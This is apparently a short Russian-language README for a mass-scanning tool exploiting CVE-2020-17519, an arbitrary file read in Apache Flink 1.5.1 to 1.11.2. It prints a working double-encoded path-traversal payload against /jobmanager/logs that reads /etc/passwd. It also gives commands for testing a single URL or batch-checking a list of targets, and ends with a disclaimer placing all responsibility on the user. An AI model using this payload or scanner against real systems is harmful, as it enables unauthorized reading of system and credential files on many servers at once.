
CVE-2020-17519; Apache Flink — произвольное чтение файлов; массовая проверка
Apache Flink 1.5.1 ~ 1.11.2
POC
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
python3 CVE-2020-17519 --help просмотр справки по использованию
python3 CVE-2020-17519 -u http://127.0.0.1:8080 проверка указанного адреса на наличие уязвимости
python3 CVE-2020-17519 -f target.txt пакетная проверка уязвимостей
Любые прямые или косвенные последствия и убытки, вызванные распространением или использованием информации, представленной в этом документе, несёт сам пользователь; автор не несёт за это никакой ответственности.